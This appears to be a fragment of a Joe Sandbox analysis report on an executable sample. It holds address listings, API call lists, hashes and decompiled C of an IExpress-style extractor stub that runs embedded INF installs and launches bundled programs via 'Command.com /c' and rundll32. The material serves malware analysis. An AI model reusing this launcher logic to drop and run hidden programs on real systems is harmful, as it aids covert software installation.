                                                                                                                                                                                                                                                0x010e3e19
                                                                                                                                                                                                                                                0x010e3f94
                                                                                                                                                                                                                                                0x010e3fa4
                                                                                                                                                                                                                                                0x010e3f7c
                                                                                                                                                                                                                                                0x010e3f80
                                                                                                                                                                                                                                                0x010e3f8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f8b
                                                                                                                                                                                                                                                0x010e3e2c
                                                                                                                                                                                                                                                0x010e3e30
                                                                                                                                                                                                                                                0x010e3e34
                                                                                                                                                                                                                                                0x010e3e36
                                                                                                                                                                                                                                                0x010e3f69
                                                                                                                                                                                                                                                0x010e3f6e
                                                                                                                                                                                                                                                0x010e3f70
                                                                                                                                                                                                                                                0x010e3f76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f76
                                                                                                                                                                                                                                                0x010e3e3c
                                                                                                                                                                                                                                                0x010e3e43
                                                                                                                                                                                                                                                0x010e3e47
                                                                                                                                                                                                                                                0x010e3e52
                                                                                                                                                                                                                                                0x010e3e56
                                                                                                                                                                                                                                                0x010e3e5c
                                                                                                                                                                                                                                                0x010e3e61
                                                                                                                                                                                                                                                0x010e3e68
                                                                                                                                                                                                                                                0x010e3e70
                                                                                                                                                                                                                                                0x010e3e74
                                                                                                                                                                                                                                                0x010e3e7c
                                                                                                                                                                                                                                                0x010e3e80
                                                                                                                                                                                                                                                0x010e3e82
                                                                                                                                                                                                                                                0x010e3e82
                                                                                                                                                                                                                                                0x010e3e87
                                                                                                                                                                                                                                                0x010e3e87
                                                                                                                                                                                                                                                0x010e3e8b
                                                                                                                                                                                                                                                0x010e3e91
                                                                                                                                                                                                                                                0x010e3e94
                                                                                                                                                                                                                                                0x010e3e96
                                                                                                                                                                                                                                                0x010e3e96
                                                                                                                                                                                                                                                0x010e3e9b
                                                                                                                                                                                                                                                0x010e3e9b
                                                                                                                                                                                                                                                0x010e3e9f
                                                                                                                                                                                                                                                0x010e3ea2
                                                                                                                                                                                                                                                0x010e3ea4
                                                                                                                                                                                                                                                0x010e3ea4
                                                                                                                                                                                                                                                0x010e3ea9
                                                                                                                                                                                                                                                0x010e3ea9
                                                                                                                                                                                                                                                0x010e3ead
                                                                                                                                                                                                                                                0x010e3eb3
                                                                                                                                                                                                                                                0x010e3eb6
                                                                                                                                                                                                                                                0x010e3eb8
                                                                                                                                                                                                                                                0x010e3eb8
                                                                                                                                                                                                                                                0x010e3ebd
                                                                                                                                                                                                                                                0x010e3ebd
                                                                                                                                                                                                                                                0x010e3ec1
                                                                                                                                                                                                                                                0x010e3ec3
                                                                                                                                                                                                                                                0x010e3ec5
                                                                                                                                                                                                                                                0x010e3ec5
                                                                                                                                                                                                                                                0x010e3eca
                                                                                                                                                                                                                                                0x010e3eca
                                                                                                                                                                                                                                                0x010e3ece
                                                                                                                                                                                                                                                0x010e3ed5
                                                                                                                                                                                                                                                0x010e3ed9
                                                                                                                                                                                                                                                0x010e3ee0
                                                                                                                                                                                                                                                0x010e3ee6
                                                                                                                                                                                                                                                0x010e3eea
                                                                                                                                                                                                                                                0x010e3eec
                                                                                                                                                                                                                                                0x010e3eee
                                                                                                                                                                                                                                                0x010e3ef3
                                                                                                                                                                                                                                                0x010e3ef3
                                                                                                                                                                                                                                                0x010e3ef5
                                                                                                                                                                                                                                                0x010e3efa
                                                                                                                                                                                                                                                0x010e3efb
                                                                                                                                                                                                                                                0x010e3efd
                                                                                                                                                                                                                                                0x010e3f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3eff
                                                                                                                                                                                                                                                0x010e3eff
                                                                                                                                                                                                                                                0x010e3f05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3f05
                                                                                                                                                                                                                                                0x010e3efd
                                                                                                                                                                                                                                                0x010e3dc7
                                                                                                                                                                                                                                                0x010e3dce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3dd0
                                                                                                                                                                                                                                                0x010e3dd7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3dd9
                                                                                                                                                                                                                                                0x010e3ddb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3ddd
                                                                                                                                                                                                                                                0x010e3de1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3de1
                                                                                                                                                                                                                                                0x010e3d59
                                                                                                                                                                                                                                                0x010e3d65
                                                                                                                                                                                                                                                0x010e3d6a
                                                                                                                                                                                                                                                0x010e3d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3d6e
                                                                                                                                                                                                                                                0x010e3d75
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3d8f
                                                                                                                                                                                                                                                0x010e3d96
                                                                                                                                                                                                                                                0x010e3d98
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3d98
                                                                                                                                                                                                                                                0x010e3c8f
                                                                                                                                                                                                                                                0x010e3c98
                                                                                                                                                                                                                                                0x010e3cf1
                                                                                                                                                                                                                                                0x010e3cf3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3cfe
                                                                                                                                                                                                                                                0x010e3d11
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3d11
                                                                                                                                                                                                                                                0x010e3c9c
                                                                                                                                                                                                                                                0x010e3ca5
                                                                                                                                                                                                                                                0x010e3ca7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3cad
                                                                                                                                                                                                                                                0x010e3cb2
                                                                                                                                                                                                                                                0x010e3cb7
                                                                                                                                                                                                                                                0x010e3cc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3ce8
                                                                                                                                                                                                                                                0x010e3cec
                                                                                                                                                                                                                                                0x010e3ced
                                                                                                                                                                                                                                                0x010e3ced
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3ce8
                                                                                                                                                                                                                                                0x010e3c9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3c9e
                                                                                                                                                                                                                                                0x010e3c56
                                                                                                                                                                                                                                                0x010e3d35
                                                                                                                                                                                                                                                0x010e3d35
                                                                                                                                                                                                                                                0x010e3d3c
                                                                                                                                                                                                                                                0x010e3d48
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3d48
                                                                                                                                                                                                                                                0x010e3c03
                                                                                                                                                                                                                                                0x010e3be2
                                                                                                                                                                                                                                                0x010e3be7
                                                                                                                                                                                                                                                0x010e3bee
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E3C11
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010E3CDC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010E8C42), ref: 010E3D8F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010E3E26
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,010E8C42), ref: 010E3EFF
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,010E8C42), ref: 010E3F1F
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,010E8C42), ref: 010E3F40
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,010E8C42), ref: 010E3F47
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010E8C42), ref: 010E3F76
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010E8C42), ref: 010E3F80
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010E8C42), ref: 010E3FC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                                • API String ID: 1032054927-3053180130
                                                                                                                                                                                                                                                • Opcode ID: 676eed3d1fdf1577cdb906ee83409c9c7c81767f6203eaa81ecec233e79721fd
                                                                                                                                                                                                                                                • Instruction ID: 00bddd72e0a924ccb5e346a19bdea5302e212816f56494443a6ffa80cb0c6865
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 676eed3d1fdf1577cdb906ee83409c9c7c81767f6203eaa81ecec233e79721fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFB19E706083019FE7749F2B9849B6A7EE4BB88B14F00496DFAD5DB290D776C8448B92
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 141 10e1ae8-10e1b2c call 10e1680 144 10e1b2e-10e1b39 141->144 145 10e1b3b-10e1b40 141->145 146 10e1b46-10e1b61 call 10e1a84 144->146 145->146 149 10e1b9f-10e1bc2 call 10e1781 call 10e658a 146->149 150 10e1b63-10e1b65 146->150 157 10e1bc7-10e1bd3 call 10e66c8 149->157 151 10e1b68-10e1b6d 150->151 151->151 153 10e1b6f-10e1b74 151->153 153->149 155 10e1b76-10e1b7b 153->155 158 10e1b7d-10e1b81 155->158 159 10e1b83-10e1b86 155->159 165 10e1bd9-10e1bf1 CompareStringA 157->165 166 10e1d73-10e1d7f call 10e66c8 157->166 158->159 161 10e1b8c-10e1b9d call 10e1680 158->161 159->149 162 10e1b88-10e1b8a 159->162 161->157 162->149 162->161 165->166 168 10e1bf7-10e1c07 GetFileAttributesA 165->168 175 10e1df8-10e1e09 LocalAlloc 166->175 176 10e1d81-10e1d99 CompareStringA 166->176 170 10e1c0d-10e1c15 168->170 171 10e1d53-10e1d5e 168->171 170->171 174 10e1c1b-10e1c33 call 10e1a84 170->174 173 10e1d64-10e1d6e call 10e44b9 171->173 187 10e1e94-10e1ea4 call 10e6ce0 173->187 189 10e1c35-10e1c38 174->189 190 10e1c50-10e1c61 LocalAlloc 174->190 178 10e1e0b-10e1e1b GetFileAttributesA 175->178 179 10e1dd4-10e1ddf 175->179 176->175 181 10e1d9b-10e1da2 176->181 183 10e1e1d-10e1e1f 178->183 184 10e1e67-10e1e73 call 10e1680 178->184 179->173 186 10e1da5-10e1daa 181->186 183->184 188 10e1e21-10e1e3e call 10e1781 183->188 199 10e1e78-10e1e84 call 10e2aac 184->199 186->186 191 10e1dac-10e1db4 186->191 188->199 210 10e1e40-10e1e43 188->210 195 10e1c3a 189->195 196 10e1c40-10e1c4b call 10e1a84 189->196 190->179 198 10e1c67-10e1c72 190->198 197 10e1db7-10e1dbc 191->197 195->196 196->190 197->197 204 10e1dbe-10e1dd2 LocalAlloc 197->204 205 10e1c79-10e1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->205 206 10e1c74 198->206 207 10e1e89-10e1e92 199->207 204->179 211 10e1de1-10e1df3 call 10e171e 204->211 208 10e1cf8-10e1d07 205->208 209 10e1cc2-10e1ccc 205->209 206->205 207->187 215 10e1d09-10e1d21 GetShortPathNameA 208->215 216 10e1d23 208->216 212 10e1cce 209->212 213 10e1cd3-10e1cf3 call 10e1680 * 2 209->213 210->199 214 10e1e45-10e1e65 call 10e16b3 * 2 210->214 211->207 212->213 213->207 214->199 221 10e1d28-10e1d2b 215->221 216->221 224 10e1d2d 221->224 225 10e1d32-10e1d4e call 10e171e 221->225 224->225 225->207
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E010E1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x10e8004; // 0x71a8563c
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E010E1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E010E1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E010E1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
					E010E658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E010E1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E010E66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E010E66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E010E1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E010E1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E010E16B3( &_v1552, 0x400, " ");
										E010E16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E010E2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E010E171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E010E1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E010E1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E010E44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x10e9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10e1140, _t156, 8,  &_v268) == 0) {
										 *0x10e9a34 =  *0x10e9a34 & 0xfffffffb;
										if( *0x10e9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E010E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x10e9a34 =  *0x10e9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E010E1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E010E1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E010E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                                                                0x010e1af3
                                                                                                                                                                                                                                                0x010e1afa
                                                                                                                                                                                                                                                0x010e1b07
                                                                                                                                                                                                                                                0x010e1b09
                                                                                                                                                                                                                                                0x010e1b1a
                                                                                                                                                                                                                                                0x010e1b20
                                                                                                                                                                                                                                                0x010e1b2c
                                                                                                                                                                                                                                                0x010e1b3b
                                                                                                                                                                                                                                                0x010e1b40
                                                                                                                                                                                                                                                0x010e1b2e
                                                                                                                                                                                                                                                0x010e1b2e
                                                                                                                                                                                                                                                0x010e1b33
                                                                                                                                                                                                                                                0x010e1b33
                                                                                                                                                                                                                                                0x010e1b46
                                                                                                                                                                                                                                                0x010e1b4c
                                                                                                                                                                                                                                                0x010e1b52
                                                                                                                                                                                                                                                0x010e1b57
                                                                                                                                                                                                                                                0x010e1b5d
                                                                                                                                                                                                                                                0x010e1b61
                                                                                                                                                                                                                                                0x010e1b9f
                                                                                                                                                                                                                                                0x010e1b9f
                                                                                                                                                                                                                                                0x010e1bb1
                                                                                                                                                                                                                                                0x010e1bc2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1b63
                                                                                                                                                                                                                                                0x010e1b63
                                                                                                                                                                                                                                                0x010e1b65
                                                                                                                                                                                                                                                0x010e1b68
                                                                                                                                                                                                                                                0x010e1b68
                                                                                                                                                                                                                                                0x010e1b6a
                                                                                                                                                                                                                                                0x010e1b6b
                                                                                                                                                                                                                                                0x010e1b6f
                                                                                                                                                                                                                                                0x010e1b74
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1b76
                                                                                                                                                                                                                                                0x010e1b7b
                                                                                                                                                                                                                                                0x010e1b86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1b8c
                                                                                                                                                                                                                                                0x010e1b8c
                                                                                                                                                                                                                                                0x010e1b98
                                                                                                                                                                                                                                                0x010e1bc7
                                                                                                                                                                                                                                                0x010e1bc9
                                                                                                                                                                                                                                                0x010e1bcc
                                                                                                                                                                                                                                                0x010e1bd3
                                                                                                                                                                                                                                                0x010e1d75
                                                                                                                                                                                                                                                0x010e1d76
                                                                                                                                                                                                                                                0x010e1d78
                                                                                                                                                                                                                                                0x010e1d7f
                                                                                                                                                                                                                                                0x010e1e05
                                                                                                                                                                                                                                                0x010e1e09
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1e12
                                                                                                                                                                                                                                                0x010e1e1b
                                                                                                                                                                                                                                                0x010e1e73
                                                                                                                                                                                                                                                0x010e1e21
                                                                                                                                                                                                                                                0x010e1e21
                                                                                                                                                                                                                                                0x010e1e28
                                                                                                                                                                                                                                                0x010e1e37
                                                                                                                                                                                                                                                0x010e1e3e
                                                                                                                                                                                                                                                0x010e1e52
                                                                                                                                                                                                                                                0x010e1e60
                                                                                                                                                                                                                                                0x010e1e60
                                                                                                                                                                                                                                                0x010e1e3e
                                                                                                                                                                                                                                                0x010e1e79
                                                                                                                                                                                                                                                0x010e1e7b
                                                                                                                                                                                                                                                0x010e1e84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1d9b
                                                                                                                                                                                                                                                0x010e1d9b
                                                                                                                                                                                                                                                0x010e1da0
                                                                                                                                                                                                                                                0x010e1da2
                                                                                                                                                                                                                                                0x010e1da5
                                                                                                                                                                                                                                                0x010e1da5
                                                                                                                                                                                                                                                0x010e1da7
                                                                                                                                                                                                                                                0x010e1da8
                                                                                                                                                                                                                                                0x010e1dac
                                                                                                                                                                                                                                                0x010e1dae
                                                                                                                                                                                                                                                0x010e1db4
                                                                                                                                                                                                                                                0x010e1db7
                                                                                                                                                                                                                                                0x010e1db7
                                                                                                                                                                                                                                                0x010e1db9
                                                                                                                                                                                                                                                0x010e1dba
                                                                                                                                                                                                                                                0x010e1dbe
                                                                                                                                                                                                                                                0x010e1dc3
                                                                                                                                                                                                                                                0x010e1dce
                                                                                                                                                                                                                                                0x010e1dd2
                                                                                                                                                                                                                                                0x010e1deb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1df0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1dd2
                                                                                                                                                                                                                                                0x010e1bf7
                                                                                                                                                                                                                                                0x010e1bfe
                                                                                                                                                                                                                                                0x010e1c07
                                                                                                                                                                                                                                                0x010e1d55
                                                                                                                                                                                                                                                0x010e1d5a
                                                                                                                                                                                                                                                0x010e1d5b
                                                                                                                                                                                                                                                0x010e1d5d
                                                                                                                                                                                                                                                0x010e1d5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1c1b
                                                                                                                                                                                                                                                0x010e1c1b
                                                                                                                                                                                                                                                0x010e1c20
                                                                                                                                                                                                                                                0x010e1c2c
                                                                                                                                                                                                                                                0x010e1c33
                                                                                                                                                                                                                                                0x010e1c38
                                                                                                                                                                                                                                                0x010e1c3a
                                                                                                                                                                                                                                                0x010e1c3a
                                                                                                                                                                                                                                                0x010e1c40
                                                                                                                                                                                                                                                0x010e1c4b
                                                                                                                                                                                                                                                0x010e1c4b
                                                                                                                                                                                                                                                0x010e1c5d
                                                                                                                                                                                                                                                0x010e1c61
                                                                                                                                                                                                                                                0x010e1dd4
                                                                                                                                                                                                                                                0x010e1dd4
                                                                                                                                                                                                                                                0x010e1dd6
                                                                                                                                                                                                                                                0x010e1ddb
                                                                                                                                                                                                                                                0x010e1ddc
                                                                                                                                                                                                                                                0x010e1dde
                                                                                                                                                                                                                                                0x010e1d64
                                                                                                                                                                                                                                                0x010e1d64
                                                                                                                                                                                                                                                0x010e1d67
                                                                                                                                                                                                                                                0x010e1d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1c67
                                                                                                                                                                                                                                                0x010e1c67
                                                                                                                                                                                                                                                0x010e1c6d
                                                                                                                                                                                                                                                0x010e1c72
                                                                                                                                                                                                                                                0x010e1c74
                                                                                                                                                                                                                                                0x010e1c74
                                                                                                                                                                                                                                                0x010e1c8e
                                                                                                                                                                                                                                                0x010e1c99
                                                                                                                                                                                                                                                0x010e1cc0
                                                                                                                                                                                                                                                0x010e1cf8
                                                                                                                                                                                                                                                0x010e1d07
                                                                                                                                                                                                                                                0x010e1d23
                                                                                                                                                                                                                                                0x010e1d09
                                                                                                                                                                                                                                                0x010e1d14
                                                                                                                                                                                                                                                0x010e1d1b
                                                                                                                                                                                                                                                0x010e1d1b
                                                                                                                                                                                                                                                0x010e1d2b
                                                                                                                                                                                                                                                0x010e1d2d
                                                                                                                                                                                                                                                0x010e1d2d
                                                                                                                                                                                                                                                0x010e1d38
                                                                                                                                                                                                                                                0x010e1d39
                                                                                                                                                                                                                                                0x010e1d46
                                                                                                                                                                                                                                                0x010e1cc2
                                                                                                                                                                                                                                                0x010e1cc2
                                                                                                                                                                                                                                                0x010e1ccc
                                                                                                                                                                                                                                                0x010e1cce
                                                                                                                                                                                                                                                0x010e1cce
                                                                                                                                                                                                                                                0x010e1cdb
                                                                                                                                                                                                                                                0x010e1ce6
                                                                                                                                                                                                                                                0x010e1cee
                                                                                                                                                                                                                                                0x010e1cee
                                                                                                                                                                                                                                                0x010e1e89
                                                                                                                                                                                                                                                0x010e1e91
                                                                                                                                                                                                                                                0x010e1e92
                                                                                                                                                                                                                                                0x010e1e94
                                                                                                                                                                                                                                                0x010e1e97
                                                                                                                                                                                                                                                0x010e1ea4
                                                                                                                                                                                                                                                0x010e1ea4
                                                                                                                                                                                                                                                0x010e1c61
                                                                                                                                                                                                                                                0x010e1c07
                                                                                                                                                                                                                                                0x010e1bd3
                                                                                                                                                                                                                                                0x010e1b7b

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010E1BE7
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010E1BFE
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010E1C57
                                                                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 010E1C88
                                                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010E1140,00000000,00000008,?), ref: 010E1CB8
                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32 ref: 010E1D1B
